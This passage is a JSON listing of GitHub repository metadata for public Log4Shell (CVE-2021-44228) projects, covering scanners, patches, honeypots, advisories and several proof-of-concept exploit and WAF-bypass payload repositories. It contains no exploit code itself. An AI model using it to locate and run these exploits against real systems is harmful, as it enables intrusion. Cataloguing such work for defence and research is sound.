+ "full_name": "Azeemering\/CVE-2021-44228-DFIR-Notes",
+ "owner": {
+ "login": "Azeemering",
+ "id": 31852867,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31852867?v=4",
+ "html_url": "https:\/\/github.com\/Azeemering"
+ },
+ "html_url": "https:\/\/github.com\/Azeemering\/CVE-2021-44228-DFIR-Notes",
+ "description": "CVE-2021-44228 DFIR Notes",
+ "fork": false,
+ "created_at": "2021-12-10T22:19:16Z",
+ "updated_at": "2023-09-28T11:33:57Z",
+ "pushed_at": "2021-12-14T12:15:16Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 437131550,
+ "name": "CVE-2021-44228-PoC-log4j-bypass-words",
+ "full_name": "Puliczek\/CVE-2021-44228-PoC-log4j-bypass-words",
+ "owner": {
+ "login": "Puliczek",
+ "id": 12344862,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12344862?v=4",
+ "html_url": "https:\/\/github.com\/Puliczek"
+ },
+ "html_url": "https:\/\/github.com\/Puliczek\/CVE-2021-44228-PoC-log4j-bypass-words",
+ "description": "🐱💻 ✂️ 🤬 CVE-2021-44228 - LOG4J Java exploit - WAF bypass tricks",
+ "fork": false,
+ "created_at": "2021-12-10T22:35:00Z",
+ "updated_at": "2024-06-23T06:30:14Z",
+ "pushed_at": "2022-01-15T16:18:44Z",
+ "stargazers_count": 930,
+ "watchers_count": 930,
+ "has_discussions": false,
+ "forks_count": 143,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "bugbounttips",
+ "bugbounty",
+ "bugbounty-writeups",
+ "cve",
+ "cve-2021-44228",
+ "cve-2021-45046",
+ "cve-2021-45105",
+ "cybersecurity",
+ "exploit",
+ "hacking",
+ "log4j",
+ "payload",
+ "pentest",
+ "pentesting",
+ "poc",
+ "red-team",
+ "security",
+ "security-writeups",
+ "writeups"
+ ],
+ "visibility": "public",
+ "forks": 143,
+ "watchers": 930,
+ "score": 0,
+ "subscribers_count": 25
+ },
+ {
+ "id": 437139341,
+ "name": "log4j-shell-poc",
+ "full_name": "kozmer\/log4j-shell-poc",
+ "owner": {
+ "login": "kozmer",
+ "id": 87979263,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87979263?v=4",
+ "html_url": "https:\/\/github.com\/kozmer"
+ },
+ "html_url": "https:\/\/github.com\/kozmer\/log4j-shell-poc",
+ "description": "A Proof-Of-Concept for the CVE-2021-44228 vulnerability. ",
+ "fork": false,
+ "created_at": "2021-12-10T23:19:28Z",
+ "updated_at": "2024-06-24T17:45:09Z",
+ "pushed_at": "2024-02-12T22:37:25Z",
+ "stargazers_count": 1768,
+ "watchers_count": 1768,
+ "has_discussions": false,
+ "forks_count": 521,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "java",
+ "log4j",
+ "security"
+ ],
+ "visibility": "public",
+ "forks": 521,
+ "watchers": 1768,
+ "score": 0,
+ "subscribers_count": 27
+ },
+ {
+ "id": 437141854,
+ "name": "cve-2021-44228-workaround-buildpack",
+ "full_name": "alexandreroman\/cve-2021-44228-workaround-buildpack",
+ "owner": {
+ "login": "alexandreroman",
+ "id": 665131,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/665131?v=4",
+ "html_url": "https:\/\/github.com\/alexandreroman"
+ },
+ "html_url": "https:\/\/github.com\/alexandreroman\/cve-2021-44228-workaround-buildpack",
+ "description": "Buildpack providing a workaround for CVE-2021-44228 (Log4j RCE exploit)",
+ "fork": false,
+ "created_at": "2021-12-10T23:34:52Z",
+ "updated_at": "2022-10-06T19:08:01Z",
+ "pushed_at": "2021-12-10T23:47:14Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 437141974,
+ "name": "minecraft-log4j-honeypot",
+ "full_name": "Adikso\/minecraft-log4j-honeypot",
+ "owner": {
+ "login": "Adikso",
+ "id": 1407751,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1407751?v=4",
+ "html_url": "https:\/\/github.com\/Adikso"
+ },
+ "html_url": "https:\/\/github.com\/Adikso\/minecraft-log4j-honeypot",
+ "description": "Minecraft Honeypot for Log4j exploit. CVE-2021-44228 Log4Shell LogJam",
+ "fork": false,
+ "created_at": "2021-12-10T23:35:31Z",
+ "updated_at": "2024-05-03T18:57:27Z",
+ "pushed_at": "2021-12-14T13:43:35Z",
+ "stargazers_count": 102,
+ "watchers_count": 102,
+ "has_discussions": false,
+ "forks_count": 20,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "exploit",
+ "log4j",
+ "minecraft"
+ ],
+ "visibility": "public",
+ "forks": 20,
+ "watchers": 102,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 437142312,
+ "name": "CVE-2021-44228",
+ "full_name": "racoon-rac\/CVE-2021-44228",
+ "owner": {
+ "login": "racoon-rac",
+ "id": 64579294,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64579294?v=4",
+ "html_url": "https:\/\/github.com\/racoon-rac"
+ },
+ "html_url": "https:\/\/github.com\/racoon-rac\/CVE-2021-44228",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-10T23:37:55Z",
+ "updated_at": "2021-12-11T01:11:19Z",
+ "pushed_at": "2023-08-29T19:02:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437142703,
+ "name": "CVE-2021-44228-PoC",
+ "full_name": "TheArqsz\/CVE-2021-44228-PoC",
+ "owner": {
+ "login": "TheArqsz",
+ "id": 38382850,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38382850?v=4",
+ "html_url": "https:\/\/github.com\/TheArqsz"
+ },
+ "html_url": "https:\/\/github.com\/TheArqsz\/CVE-2021-44228-PoC",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-10T23:40:39Z",
+ "updated_at": "2021-12-17T15:29:24Z",
+ "pushed_at": "2021-12-17T15:29:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437155858,
+ "name": "log4shelldetect",
+ "full_name": "1lann\/log4shelldetect",
+ "owner": {
+ "login": "1lann",
+ "id": 804919,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/804919?v=4",
+ "html_url": "https:\/\/github.com\/1lann"
+ },
+ "html_url": "https:\/\/github.com\/1lann\/log4shelldetect",
+ "description": "Rapidly scan filesystems for Java programs potentially vulnerable to Log4Shell (CVE-2021-44228) or \"that Log4j JNDI exploit\" by inspecting the class paths inside files",
+ "fork": false,
+ "created_at": "2021-12-11T01:08:00Z",
+ "updated_at": "2023-03-16T10:47:12Z",
+ "pushed_at": "2022-01-05T23:07:50Z",
+ "stargazers_count": 44,
+ "watchers_count": 44,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "cve-2021-45046",
+ "log4j",
+ "log4j2",
+ "log4shell",
+ "scanner",
+ "vulnerability-scanners"
+ ],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 44,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 437164940,
+ "name": "Log4j2-RCE",
+ "full_name": "binganao\/Log4j2-RCE",
+ "owner": {
+ "login": "binganao",
+ "id": 70050083,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70050083?v=4",
+ "html_url": "https:\/\/github.com\/binganao"
+ },
+ "html_url": "https:\/\/github.com\/binganao\/Log4j2-RCE",
+ "description": "Log4j2 CVE-2021-44228 复现和回显利用",
+ "fork": false,
+ "created_at": "2021-12-11T02:08:41Z",
+ "updated_at": "2021-12-27T05:55:01Z",
+ "pushed_at": "2021-12-11T03:38:03Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437170557,
+ "name": "sample-ldap-exploit",
+ "full_name": "phoswald\/sample-ldap-exploit",
+ "owner": {
+ "login": "phoswald",
+ "id": 12776329,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12776329?v=4",
+ "html_url": "https:\/\/github.com\/phoswald"
+ },
+ "html_url": "https:\/\/github.com\/phoswald\/sample-ldap-exploit",
+ "description": "A short demo of CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-11T02:45:39Z",
+ "updated_at": "2023-09-28T11:33:58Z",
+ "pushed_at": "2021-12-13T09:20:35Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 437174339,
+ "name": "jndi-ldap-test-server",
+ "full_name": "rakutentech\/jndi-ldap-test-server",
+ "owner": {
+ "login": "rakutentech",
+ "id": 1415441,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1415441?v=4",
+ "html_url": "https:\/\/github.com\/rakutentech"
+ },
+ "html_url": "https:\/\/github.com\/rakutentech\/jndi-ldap-test-server",
+ "description": "A minimalistic LDAP server that is meant for test vulnerability to JNDI+LDAP injection attacks in Java, especially CVE-2021-44228.",
+ "fork": false,
+ "created_at": "2021-12-11T03:08:14Z",
+ "updated_at": "2024-06-11T12:40:21Z",
+ "pushed_at": "2021-12-13T16:17:03Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "jndi",
+ "ldap",
+ "log4j",
+ "log4j2",
+ "vulnerability-detection"
+ ],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 437186290,
+ "name": "cve-2021-44228--spring-hibernate",
+ "full_name": "uint0\/cve-2021-44228--spring-hibernate",
+ "owner": {
+ "login": "uint0",
+ "id": 11325389,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11325389?v=4",
+ "html_url": "https:\/\/github.com\/uint0"
+ },
+ "html_url": "https:\/\/github.com\/uint0\/cve-2021-44228--spring-hibernate",
+ "description": "CVE-2021-44228 POC - Spring \/ Hibernate",
+ "fork": false,
+ "created_at": "2021-12-11T04:23:22Z",
+ "updated_at": "2021-12-15T05:36:58Z",
+ "pushed_at": "2021-12-11T06:25:12Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437214791,
+ "name": "log4j-vulnerability-patcher-agent",
+ "full_name": "saharNooby\/log4j-vulnerability-patcher-agent",
+ "owner": {
+ "login": "saharNooby",
+ "id": 10616794,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10616794?v=4",
+ "html_url": "https:\/\/github.com\/saharNooby"
+ },
+ "html_url": "https:\/\/github.com\/saharNooby\/log4j-vulnerability-patcher-agent",
+ "description": "Fixes CVE-2021-44228 in log4j by patching JndiLookup class",
+ "fork": false,
+ "created_at": "2021-12-11T07:16:21Z",
+ "updated_at": "2023-06-19T16:50:28Z",
+ "pushed_at": "2021-12-11T07:34:01Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "agent",
+ "bytecode",
+ "cve",
+ "fix",
+ "log4j",
+ "patch"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437215271,
+ "name": "log4j2burpscanner",
+ "full_name": "f0ng\/log4j2burpscanner",
+ "owner": {
+ "login": "f0ng",
+ "id": 48286013,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48286013?v=4",
+ "html_url": "https:\/\/github.com\/f0ng"
+ },
+ "html_url": "https:\/\/github.com\/f0ng\/log4j2burpscanner",
+ "description": "CVE-2021-44228 Log4j2 BurpSuite Scanner,Customize ceye.io api or other apis,including internal networks",
+ "fork": false,
+ "created_at": "2021-12-11T07:19:11Z",
+ "updated_at": "2024-06-25T02:46:07Z",
+ "pushed_at": "2023-06-13T09:17:54Z",
+ "stargazers_count": 789,
+ "watchers_count": 789,
+ "has_discussions": false,
+ "forks_count": 113,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "burp-extensions",
+ "burp-plugin",
+ "log4j2",
+ "log4jshell"
+ ],
+ "visibility": "public",
+ "forks": 113,
+ "watchers": 789,
+ "score": 0,
+ "subscribers_count": 11
+ },
+ {
+ "id": 437221795,
+ "name": "CVE-2021-44228-Log4j-lookup-Rce",
+ "full_name": "M1ngGod\/CVE-2021-44228-Log4j-lookup-Rce",
+ "owner": {
+ "login": "M1ngGod",
+ "id": 81064151,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81064151?v=4",
+ "html_url": "https:\/\/github.com\/M1ngGod"
+ },
+ "html_url": "https:\/\/github.com\/M1ngGod\/CVE-2021-44228-Log4j-lookup-Rce",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-11T07:55:45Z",
+ "updated_at": "2023-08-15T12:51:02Z",
+ "pushed_at": "2021-12-11T08:07:20Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437244092,
+ "name": "CVE-2021-44228-Apache-Log4j-Rce",
+ "full_name": "byteboycn\/CVE-2021-44228-Apache-Log4j-Rce",
+ "owner": {
+ "login": "byteboycn",
+ "id": 14987996,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14987996?v=4",
+ "html_url": "https:\/\/github.com\/byteboycn"
+ },
+ "html_url": "https:\/\/github.com\/byteboycn\/CVE-2021-44228-Apache-Log4j-Rce",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-11T09:52:36Z",
+ "updated_at": "2023-06-20T16:41:33Z",
+ "pushed_at": "2021-12-11T09:53:39Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437248883,
+ "name": "log4shell-mitigation-tester",
+ "full_name": "lhotari\/log4shell-mitigation-tester",
+ "owner": {
+ "login": "lhotari",
+ "id": 66864,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66864?v=4",
+ "html_url": "https:\/\/github.com\/lhotari"
+ },
+ "html_url": "https:\/\/github.com\/lhotari\/log4shell-mitigation-tester",
+ "description": "Log4Shell CVE-2021-44228 mitigation tester",
+ "fork": false,
+ "created_at": "2021-12-11T10:16:58Z",
+ "updated_at": "2021-12-21T20:05:48Z",
+ "pushed_at": "2021-12-13T17:24:37Z",
+ "stargazers_count": 16,
+ "watchers_count": 16,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 16,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 437249303,
+ "name": "log4j-rce-detect-waf-bypass",
+ "full_name": "toramanemre\/log4j-rce-detect-waf-bypass",
+ "owner": {
+ "login": "toramanemre",
+ "id": 24626967,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24626967?v=4",
+ "html_url": "https:\/\/github.com\/toramanemre"
+ },
+ "html_url": "https:\/\/github.com\/toramanemre\/log4j-rce-detect-waf-bypass",
+ "description": "A Nuclei Template for Apache Log4j RCE (CVE-2021-44228) Detection with WAF Bypass Payloads",
+ "fork": false,
+ "created_at": "2021-12-11T10:19:01Z",
+ "updated_at": "2024-01-19T05:36:30Z",
+ "pushed_at": "2021-12-11T10:19:51Z",
+ "stargazers_count": 23,
+ "watchers_count": 23,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 23,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 437261211,
+ "name": "CVE-2021-44228-Scanner",
+ "full_name": "logpresso\/CVE-2021-44228-Scanner",
+ "owner": {
+ "login": "logpresso",
+ "id": 14171714,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14171714?v=4",
+ "html_url": "https:\/\/github.com\/logpresso"
+ },
+ "html_url": "https:\/\/github.com\/logpresso\/CVE-2021-44228-Scanner",
+ "description": "Vulnerability scanner and mitigation patch for Log4j2 CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-11T11:18:46Z",
+ "updated_at": "2024-06-25T16:06:13Z",
+ "pushed_at": "2022-04-07T14:47:03Z",
+ "stargazers_count": 851,
+ "watchers_count": 851,
+ "has_discussions": false,
+ "forks_count": 175,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-4104",
+ "cve-2021-42550",
+ "cve-2021-44228",
+ "cve-2021-44832",
+ "cve-2021-45046",
+ "cve-2021-45105",
+ "cve-2022-23302",
+ "cve-2022-23305",
+ "cve-2022-23307",
+ "log4j2",
+ "patch",
+ "scanner"
+ ],
+ "visibility": "public",
+ "forks": 175,
+ "watchers": 851,
+ "score": 0,
+ "subscribers_count": 33
+ },
+ {
+ "id": 437265194,
+ "name": "Log4j_CVE-2021-44228",
+ "full_name": "vorburger\/Log4j_CVE-2021-44228",
+ "owner": {
+ "login": "vorburger",
+ "id": 298598,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/298598?v=4",
+ "html_url": "https:\/\/github.com\/vorburger"
+ },
+ "html_url": "https:\/\/github.com\/vorburger\/Log4j_CVE-2021-44228",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-11T11:38:16Z",
+ "updated_at": "2023-09-28T11:33:58Z",
+ "pushed_at": "2022-02-16T21:58:54Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": true,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 437265792,
+ "name": "log4j2021_vul_test",
+ "full_name": "gauthamg\/log4j2021_vul_test",
+ "owner": {
+ "login": "gauthamg",
+ "id": 8748677,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8748677?v=4",
+ "html_url": "https:\/\/github.com\/gauthamg"
+ },
+ "html_url": "https:\/\/github.com\/gauthamg\/log4j2021_vul_test",
+ "description": "Test the CVE https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-11T11:41:04Z",
+ "updated_at": "2021-12-13T06:49:35Z",
+ "pushed_at": "2021-12-13T06:49:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437273514,
+ "name": "CVE-2021-44228-playground",
+ "full_name": "b-abderrahmane\/CVE-2021-44228-playground",
+ "owner": {
+ "login": "b-abderrahmane",
+ "id": 10504574,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10504574?v=4",
+ "html_url": "https:\/\/github.com\/b-abderrahmane"
+ },
+ "html_url": "https:\/\/github.com\/b-abderrahmane\/CVE-2021-44228-playground",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-11T12:16:45Z",
+ "updated_at": "2024-04-29T17:48:37Z",
+ "pushed_at": "2024-06-24T03:01:43Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 437278973,
+ "name": "CVE-2021-44228-Advisories",
+ "full_name": "leetxyz\/CVE-2021-44228-Advisories",
+ "owner": {
+ "login": "leetxyz",
+ "id": 46599191,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46599191?v=4",
+ "html_url": "https:\/\/github.com\/leetxyz"
+ },
+ "html_url": "https:\/\/github.com\/leetxyz\/CVE-2021-44228-Advisories",
+ "description": "List of company advisories log4j",
+ "fork": false,
+ "created_at": "2021-12-11T12:41:38Z",
+ "updated_at": "2023-09-28T11:33:59Z",
+ "pushed_at": "2021-12-12T09:46:17Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437283982,
+ "name": "log4shell",
+ "full_name": "cado-security\/log4shell",
+ "owner": {
+ "login": "cado-security",
+ "id": 63289041,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63289041?v=4",
+ "html_url": "https:\/\/github.com\/cado-security"
+ },
+ "html_url": "https:\/\/github.com\/cado-security\/log4shell",
+ "description": "Content to help the community responding to the Log4j Vulnerability Log4Shell CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-11T13:03:31Z",
+ "updated_at": "2022-03-02T21:45:15Z",
+ "pushed_at": "2021-12-11T14:52:30Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "log4shell",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 437289885,
+ "name": "Log4J_0day_RCE",
+ "full_name": "WYSIIWYG\/Log4J_0day_RCE",
+ "owner": {
+ "login": "WYSIIWYG",
+ "id": 95032387,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95032387?v=4",
+ "html_url": "https:\/\/github.com\/WYSIIWYG"
+ },
+ "html_url": "https:\/\/github.com\/WYSIIWYG\/Log4J_0day_RCE",
+ "description": "Log4j-RCE (CVE-2021-44228) Proof of Concept",
+ "fork": false,
+ "created_at": "2021-12-11T13:28:52Z",
+ "updated_at": "2023-09-28T11:33:59Z",
+ "pushed_at": "2021-12-11T13:31:47Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437296454,
+ "name": "log4j-vulnerable-app-cve-2021-44228-terraform",
+ "full_name": "mkhazamipour\/log4j-vulnerable-app-cve-2021-44228-terraform",
+ "owner": {
+ "login": "mkhazamipour",
+ "id": 23025217,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23025217?v=4",
+ "html_url": "https:\/\/github.com\/mkhazamipour"
+ },
+ "html_url": "https:\/\/github.com\/mkhazamipour\/log4j-vulnerable-app-cve-2021-44228-terraform",
+ "description": "A Terraform to deploy vulnerable app and a JDNIExploit to work with CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-11T13:56:28Z",
+ "updated_at": "2022-01-25T17:42:11Z",
+ "pushed_at": "2021-12-11T14:53:38Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437310436,
+ "name": "log4j-CVE-2021-44228-Public-IoCs",
+ "full_name": "Sh0ckFR\/log4j-CVE-2021-44228-Public-IoCs",
+ "owner": {
+ "login": "Sh0ckFR",
+ "id": 10033649,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10033649?v=4",
+ "html_url": "https:\/\/github.com\/Sh0ckFR"
+ },
+ "html_url": "https:\/\/github.com\/Sh0ckFR\/log4j-CVE-2021-44228-Public-IoCs",
+ "description": "Public IoCs about log4j CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-11T14:54:45Z",
+ "updated_at": "2023-09-28T11:33:59Z",
+ "pushed_at": "2021-12-17T10:14:30Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437316134,
+ "name": "log4j2-vulnerable-spring-app",
+ "full_name": "zzzz0317\/log4j2-vulnerable-spring-app",
+ "owner": {
+ "login": "zzzz0317",
+ "id": 16097046,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16097046?v=4",
+ "html_url": "https:\/\/github.com\/zzzz0317"
+ },
+ "html_url": "https:\/\/github.com\/zzzz0317\/log4j2-vulnerable-spring-app",
+ "description": "CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-11T15:18:42Z",
+ "updated_at": "2023-10-23T06:12:54Z",
+ "pushed_at": "2021-12-13T02:14:14Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437319619,
+ "name": "test-44228",
+ "full_name": "datadavev\/test-44228",
+ "owner": {
+ "login": "datadavev",
+ "id": 605409,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/605409?v=4",
+ "html_url": "https:\/\/github.com\/datadavev"
+ },
+ "html_url": "https:\/\/github.com\/datadavev\/test-44228",
+ "description": "Simple demo of CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-11T15:33:17Z",
+ "updated_at": "2021-12-11T15:42:35Z",
+ "pushed_at": "2022-01-04T16:56:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437323133,
+ "name": "JndiRemover",
+ "full_name": "LemonCraftRu\/JndiRemover",
+ "owner": {
+ "login": "LemonCraftRu",
+ "id": 73554117,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73554117?v=4",
+ "html_url": "https:\/\/github.com\/LemonCraftRu"
+ },
+ "html_url": "https:\/\/github.com\/LemonCraftRu\/JndiRemover",
+ "description": "Небольшой мод направленный на устранение уязвимости CVE-2021-44228",
+ "fork": false,
